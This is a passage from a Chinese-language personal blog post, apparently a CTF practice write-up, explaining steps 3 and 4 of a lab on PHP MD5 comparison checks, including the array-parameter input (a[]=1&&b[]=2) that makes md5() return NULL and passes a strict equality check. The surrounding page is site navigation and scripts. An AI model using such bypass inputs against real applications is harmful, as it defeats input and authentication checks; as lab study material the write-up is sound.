<h2 id="第三步"><a href="#第三步" class="headerlink" title="第三步"></a>第三步</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// step 3</span></span><br><span class="line"><span class="variable">$a</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line"><span class="variable">$b</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$a</span> !== <span class="variable">$b</span> &amp;&amp; md5(<span class="variable">$a</span>) === md5(<span class="variable">$b</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;step 3 ok !!! wuhu~~&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>这里是a和b的值不等，但是md5加密后却相等。因为这里是<code>===</code>不仅<strong>比较值相等还会比较值得类型是否相同</strong>0E在这里就不可用了。</p>
<p><strong>php中md5和sha1函数都无法处理数组，会返回NULL</strong><br>所以构造<code>a[]=1&amp;&amp;b[]=2</code>就可以绕过。<a target="_blank" rel="noopener" href="https://blog.csdn.net/john_lain/article/details/83478023">参考</a></p>
<h2 id="第四步"><a href="#第四步" class="headerlink" title="第四步"></a>第四步</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// step 4</span></span><br><span class="line">    <span class="variable">$val5</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val5&#x27;</span>];</span><br><span class="line">    <span class="variable">$val6</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val6&#x27;</span>];</span><br><span class="line">    <span class="variable">$val7</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val7&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(md5(<span class="variable">$val5</span>) === md5(<span class="variable">$val6</span>) &amp;&amp; md5(<span class="variable">$val6</span>) === md5(<span class="variable">$val7</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;tql!ddw! 记录你的名字吧!&quot;</span>;</span><br><span class="line">        <span class="variable">$name</span> =  @<span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span>(strlen(<span class="variable">$name</span>)&gt;<span class="number">5</span>)&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;what???&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        file_put_contents(<span class="string">&quot;./success.txt&quot;</span>,<span class="variable">$name</span>.PHP_EOL,FILE_APPEND);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个不用搞了，没传值直接就ok</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%88%B7%E9%A2%98/" rel="tag"># 刷题</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/02/02/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" rel="prev" title="刷题记录-1">
      <i class="fa fa-chevron-left"></i> 刷题记录-1
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-LoveSQL"><span class="nav-number">1.</span> <span class="nav-text">[极客大挑战 2019]LoveSQL</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#GXYCTF2019-Ping-Ping-Ping"><span class="nav-number">2.</span> <span class="nav-text">[GXYCTF2019]Ping Ping Ping</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Http"><span class="nav-number">3.</span> <span class="nav-text">[极客大挑战 2019]Http</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#command-execution%EF%BC%88%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%EF%BC%89"><span class="nav-number">4.</span> <span class="nav-text">command_execution（攻防世界）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#upload1%EF%BC%88%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%EF%BC%89"><span class="nav-number">5.</span> <span class="nav-text">upload1（攻防世界）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#RoarCTF-2019-Easy-Calc"><span class="nav-number">6.</span> <span class="nav-text">[RoarCTF 2019]Easy Calc</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CVE-2021-41773%EF%BC%88%E5%AE%9E%E9%AA%8C%E5%AE%A4%EF%BC%89"><span class="nav-number">7.</span> <span class="nav-text">CVE-2021-41773（实验室）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MD5-%E5%90%84%E7%A7%8D%E6%AF%94%E8%BE%83%EF%BC%88%E5%AE%9E%E9%AA%8C%E5%AE%A4%EF%BC%89"><span class="nav-number">8.</span> <span class="nav-text">MD5 各种比较（实验室）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E6%AD%A5"><span class="nav-number">8.1.</span> <span class="nav-text">第一步</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E6%AD%A5"><span class="nav-number">8.2.</span> <span class="nav-text">第二步</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E6%AD%A5"><span class="nav-number">8.3.</span> <span class="nav-text">第三步</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%9B%9B%E6%AD%A5"><span class="nav-number">8.4.</span> <span class="nav-text">第四步</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Harbeter"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">Harbeter</p>
  <div class="site-description" itemprop="description">愿你永远善良，永远向往未来！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:qq2300350627@163.com" title="E-Mail → mailto:qq2300350627@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">冀ICP备2021027275号 </a>
  </div>

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harbeter</span>
</div>


        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/canvas_lines.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>


